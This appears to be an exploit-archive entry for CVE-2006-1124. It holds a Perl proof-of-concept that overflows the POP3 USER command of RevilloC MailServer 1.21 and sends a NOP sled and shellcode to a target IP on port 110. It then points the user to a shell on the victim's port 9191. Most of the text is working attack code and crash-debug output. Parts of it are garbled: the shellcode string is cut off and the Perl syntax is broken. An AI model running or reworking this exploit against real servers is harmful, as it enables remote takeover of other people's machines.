RevilloC MailServer 1.21 - 'USER' Remote Buffer Overflow

Related Vulnerabilities: CVE-2006-1124  
Publish Date: 07 Mar 2006
                #!/usr/bin/perl -w    
#revilloC mail server PoC exploit ( for xp sp1)
# Discovered securma massine from MorX Security Research Team (
#RevilloC is a MailServer and Proxy v 1.21 (
#The mail server is a central point for emails coming in and going out from  home or office
#The service will work with any standard email client that supports POP3 and SMTP.  
#by sending a large buffer  after USER commands
#C:\>nc 110
#+OK RevilloC POP3 Ready
#USER  "A" x4081 + "\xff"x4 + "\xdd"x4 + "\x0d\x0a" (xp sp2)
#we have:
#access violation when reading [dddddddd].
#7C92B3FB   8B0B     MOV ECX,DWORD PTR DS:[EBX]  --->EBX pointe to  "\xdd"x4
#ECX   dddddddd
#Vendor contacted 14/01/2006 , No response,No patch.
#this entire document is for eductional, testing and demonstrating purpose only.
#greets all MorX members,undisputed,sara
#!/usr/bin/perl -w     	  
use IO::Socket;
                     if ($#ARGV<0) 
                         print "\n write the target IP!! \n\n"; 

        $shellcode = "\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x83\xC0\x11\x33".
                $buffer = "\x90"x3601;
                $eax ="\x83\xb5\x19\x01"; # change if needed             
                $peb= "\x20\xf0\xfd\x7f"; #PEB lock
                $user ="USER  ";
                $enter  = "\x0d\x0a";
                $connect = IO::Socket::INET ->new (Proto=>"tcp",
	      PeerAddr=> "$ARGV[0]",
	      PeerPort=>"110"); unless ($connect) { die "cant connect" }  
                print "\nRevilloC mail server remote PoC exploit by securma massine\n";
                print "\nsecurma\\n";
                print "\\n";              
                print "$text\n";
                print "[+] Sent USER\n";
                $connect->send($user . $buffer . $shellcode . $eax . $peb . $enter); 
	      print "[+] Sent shellcode..telnet to victim host port 9191\n";

# [2006-03-07]